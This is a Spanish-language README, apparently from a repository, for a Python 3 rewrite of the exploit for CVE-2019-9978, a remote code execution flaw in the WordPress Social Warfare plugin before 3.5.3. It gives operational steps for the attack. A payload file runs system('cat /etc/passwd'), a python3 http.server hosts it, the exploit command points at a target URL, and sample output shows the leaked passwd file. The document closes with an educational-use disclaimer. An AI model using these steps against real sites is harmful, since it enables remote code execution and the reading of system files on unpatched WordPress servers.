
Una vulnerabilidad de ejecución remota de código (RCE) en el plugin Social Warfare para WordPress, que afecta a versiones anteriores a la 3.5.3.
Una vulnerabilidad de Ejecución Remota de Código (RCE) en el plugin Social Warfare para WordPress, que afecta a todas las versiones anteriores a 3.5.3.
El exploit público original fue escrito en una versión obsoleta de Python y ya no funciona correctamente en entornos modernos.
Reescribí el exploit para que sea totalmente compatible con Python 3, haciéndolo más fácil de usar, entender e integrar en herramientas modernas.
Crea un archivo llamado payload.txt con el siguiente contenido:
<pre>system('cat /etc/passwd')</pre>
Usa Python para servir tu payload:
python3 -m http.server 8000
Esto hará que tu payload.txt sea accesible en:
http://<your-ip>:8000/payload.txt
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
--payload-uri http://<your-ip>:8000/payload.txt
Si el objetivo es vulnerable, recibirás una salida similar a:
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...



🧬 Si este payload te alegró el día, una ⭐ haría el mío.
< 3.5.3⚠️ Descargo de responsabilidad: Este repositorio es solo para fines educativos y de pruebas éticas.
El uso no autorizado de este exploit contra sistemas que no posees está estrictamente prohibido.